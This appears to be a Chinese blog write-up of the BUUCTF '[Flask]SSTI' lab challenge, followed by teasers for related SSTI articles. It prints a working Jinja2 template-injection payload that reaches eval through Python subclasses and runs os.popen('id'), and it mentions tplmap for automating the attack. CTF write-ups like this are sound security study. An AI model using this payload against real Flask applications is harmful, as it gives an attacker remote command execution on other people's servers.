环境

BUUCTF上的在线环境，启动靶机，获取链接：
http://node4.buuoj.cn:27904

解题思路

访问后显示页面。

根据题目提示是考SSTI，所以我们传个name参数看看。
http://node4.buuoj.cn:27904/?name=12,将我们的12显示在页面。

我们在构造{{2*3}}看看，是否存在SSTI。

成功执行了乘法，说明是存在SSTI的，接下来我们要做的是寻找可以执行命令的函数所在的类。
这里我在网上找的：

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval']('__import__("os").popen("id").read()') }}{% endif %}{% endif %}{% endfor %}
{% endif %}
{% endfor %}

成功执行，接下来找flag，最后发现在env中发现了flag。

通过网上的资料了解到tplmap脚本可以梭哈。

参考

https://blog.csdn.net/qq_36241198/article/details/114882798
SSTI模板注入绕过（进阶篇）
SSTI模板注入及绕过姿势(基于Python-Jinja2)
[Flask(Jinja2)服务端模板注入漏洞(SSTI)]学习简记

[Flask]SSTI相关推荐

flask SSTI漏洞
文章目录第一章 Flask ssti漏洞的代码(长什么样子) 1.1 代码 1.2 正常测试 1.3 利用漏洞测试 1.3.1 获取字典中的密钥 1.3.2 获取整个person 字典中的内容 1. ...
flask ssti 的一些黑名单绕过姿势
转自 https://p0sec.net/index.php/archives/120/ 最近学flask的ssti,看到一些比较好的文章,分享并记录学习一下 0x00 获取基本类首先通过str.d ...
Flask服务端模板(Jinja2) SSTI 注入漏洞
漏洞简介 flask/ssti漏洞,即: Flask(Jinja2) 服务端模板注入漏洞(SSTI).Flask 是一个使用 Python 编写的轻量级 Web 应用框架,Flask 为你提供工具,库 ...
Django及Flask漏洞合集
Django漏洞 Django任意代码执行 poc: import os os.environ.setdefault('DJANGO_SETTINGS_MODULE','settings') from ...
vulhub安装教程
0x00 vulhub介绍 Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更 ...
jinja2模板注入_Flask jinja2 模板注入思路总结
Flask jinja2 模板注入思路总结前言虽然这个漏洞已经出现很久了, 不过偶尔还是能够看到翻了翻 freebuf 上好像只有 python2 的一些 payload, 方法也不是很全我找来找 ...
Python安全攻防-3渗透测试框架
最近新买了一本关于Python的一本书<Python安全攻防渗透测试实战指南>,这本书出自MS08067安全实验室,才学到第三章,虽然书中有非常多的低级语法错误,但是总体来讲还是值得一学的 ...
赛博杯2020WP web
尖尖的商店1 直接抓包修改钱数拿到flag Easy-Baby-Signin 套娃题目, 1.先抓包.用bp弱口令爆破http认证.猜测用户名是admin.爆破得到密码为123456789. 2.查看 ...
docker下载及vulhub靶场
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行一条命令即可编译.运行一个完整的漏洞靶场镜像. Installation 在Ubuntu 20.04下安装docker/dock ...

[Flask]SSTI

文章目录

环境

解题思路

参考

[Flask]SSTI相关推荐

最新文章

热门文章